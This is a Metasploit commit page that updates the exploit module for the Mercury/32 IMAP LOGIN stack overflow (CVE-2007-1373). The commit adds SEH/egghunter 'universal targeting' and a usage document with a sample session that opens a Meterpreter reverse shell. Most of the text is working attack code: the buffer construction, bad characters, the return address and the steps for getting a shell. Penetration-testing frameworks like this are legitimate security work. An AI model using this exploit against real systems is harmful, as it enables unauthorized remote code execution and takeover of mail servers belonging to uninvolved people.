Land #10853, Add universal targeting to Mercury/32 IMAP LOGIN exploit

rapid7 · Oct 29, 2018 · d6c4f5e · d6c4f5e
1 parent e843da9
commit d6c4f5e
Show file tree

Hide file tree

Showing 2 changed files with 83 additions and 39 deletions.
diff --git a/modules/exploits/windows/imap/mercury_login.md b/modules/exploits/windows/imap/mercury_login.md
@@ -0,0 +1,48 @@
+Mercury/32 <= 4.01b contains an stack based buffer overflow in IMAPD LOGIN verb. Sending an specially crafted IMAP login command allows remote code execution.
+
+## Vulnerable Application
+
+This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD LOGIN verb. By sending a specially crafted login command, a buffer is corrupted, and code execution is possible. This vulnerability was discovered by (mu-b at digit-labs.org).
+
+* [Mercury/32 v4.01a](https://www.exploit-db.com/apps/8e0bf8aec964af66a5d440ef705d548f-m32-401a.exe)
+* [Mercury/32 v4.01b upgrade](http://web.archive.org/web/20070119125847if_/http://ftp.usm.maine.edu/pegasus/Mercury32/m32-401b.zip)
+
+This module has been tested successfully on:
+
+* Mercury/32 v4.01a on Windows XP SP3 (x86)
+* Mercury/32 v4.01a on Windows 7 SP1 (x86)
+* Mercury/32 v4.01a on Windows Server 2003 Standard Edition SP1 (x86)
+* Mercury/32 v4.01b on Windows 7 SP1 (x86)
+
+## Verification steps
+
+  1. Install the vulnerable Mercury/32 application
+  2. Start msfconsole
+  3. Do: `use exploit/windows/imap/mercury_login`
+  4. Do: `set RHOST IP`
+  5. Do: `exploit`
+  6. You should get a shell.
+
+## Scenarios
+
+### Mercury/32 v4.01a on Windows 7 SP1 x86
+```
+msf > use exploit/windows/imap/mercury_login1
+msf exploit(windows/imap/mercury_login1) > set rhost 192.168.46.144
+rhost => 192.168.46.144
+msf exploit(windows/imap/mercury_login1) > exploit
+
+[*] Started reverse TCP handler on 192.168.46.1:4444
+[*] 192.168.46.144:143 - Sending payload (8931 bytes) ...
+[*] Sending stage (179779 bytes) to 192.168.46.144
+[*] Meterpreter session 1 opened (192.168.46.1:4444 -> 192.168.46.144:49219) at 2018-10-27 20:43:14 +0200
+
+meterpreter >
+Computer        : WIN-DQ8ELRSOJAO
+OS              : Windows 7 (Build 7601, Service Pack 1).
+Architecture    : x86
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+```
diff --git a/modules/exploits/windows/imap/mercury_login.rb b/modules/exploits/windows/imap/mercury_login.rb
@@ -4,87 +4,83 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = AverageRanking
+  Rank = NormalRanking
 
   include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::Seh
+  include Msf::Exploit::Remote::Egghunter
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Mercury/32 LOGIN Buffer Overflow',
-      'Description'    => %q{
+      'Name' => 'Mercury/32 4.01 IMAP LOGIN SEH Buffer Overflow',
+      'Description' => %q{
         This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD
         LOGIN verb. By sending a specially crafted login command, a buffer
         is corrupted, and code execution is possible. This vulnerability was
         discovered by (mu-b at digit-labs.org).
       },
-      'Author'         => [ 'MC' ],
+      'Author'         =>
+        [
+        'mu-b', # Discovery and exploit
+        'MC', # Metasploit module
+        'Ivan Racic' # Automatic targeting + egg hunter
+        ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'CVE', '2007-1373' ],
-          [ 'OSVDB', '33883' ],
+          ['CVE', '2007-1373'],
+          ['EDB', '3418']
         ],
       'Privileged'     => true,
       'DefaultOptions' =>
         {
-          'EXITFUNC' => 'thread',
+          'EXITFUNC' => 'thread'
         },
       'Payload'        =>
         {
-          'Space'    => 800,
           'BadChars' => "\x00\x0a\x0d\x20",
-          'StackAdjustment' => -3500,
+          'Space' => 2500
         },
       'Platform'       => 'win',
       'Targets'        =>
         [
-          [ 'Windows 2000 SP0-SP4 English',		{ 'Ret' => 0x75022ac4 } ],
-          [ 'Windows XP Pro SP0/SP1 English',		{ 'Ret' => 0x71aa32ad } ],
-        ],
-      'DisclosureDate' => 'Mar 6 2007',
-      'DefaultTarget'  => 0))
-
+          ['Windows Universal',
+            {
+              'Ret' => 0x00401460
+            }]
+          ],
+        'DisclosureDate' => 'Mar 6 2007',
+        'DefaultTarget'  => 0))
     register_options(
       [
         Opt::RPORT(143)
-      ])
+      ]
+    )
   end
 
   def check
     connect
     resp = sock.get_once
     disconnect
-
-    if (resp =~ /Mercury\/32 v4\.01[a-b]/)
-      return Exploit::CheckCode::Appears
-    end
-      return Exploit::CheckCode::Safe
+    return CheckCode::Vulnerable if resp =~ %r{Mercury/32 v4\.01[ab]}
+    Exploit::CheckCode::Safe
   end
 
   def exploit
+    hunter, egg = generate_egghunter(payload.encoded)
     connect
     sock.get_once
-
     num = rand(255).to_i
-
-    sploit = "A001 LOGIN " + (" " * 1008) + "{#{num}}\n"
+    sploit = 'A001 LOGIN ' + "\x20" * 1008 + "{#{num}}\n"
+    sploit << rand_text_alpha_upper(347)
+    sploit << egg + payload.encoded
+    sploit << rand_text_alpha_upper(7500 - payload.encoded.length - egg.length)
+    sploit << "\x74\x06\x75\x04" + [target.ret].pack('V')
+    sploit << make_nops(20)
+    sploit << hunter
     sock.put(sploit)
     sock.get_once
-
-    sploit << rand_text_alpha_upper(255)
-    sock.put(sploit)
-    sock.get_once
-
-    sploit << make_nops(5295 - payload.encoded.length)
-    sploit << payload.encoded + Rex::Arch::X86.jmp_short(6)
-    sploit << make_nops(2) + [target.ret].pack('V')
-    sploit << [0xe8, -1200].pack('CV') + rand_text_alpha_upper(750)
-
-    print_status("Trying target #{target.name}...")
-
-    sock.put(sploit)
-    select(nil,nil,nil,1)
-
+    print_status("Sending payload (#{sploit.length} bytes) ...")
     handler
     disconnect
   end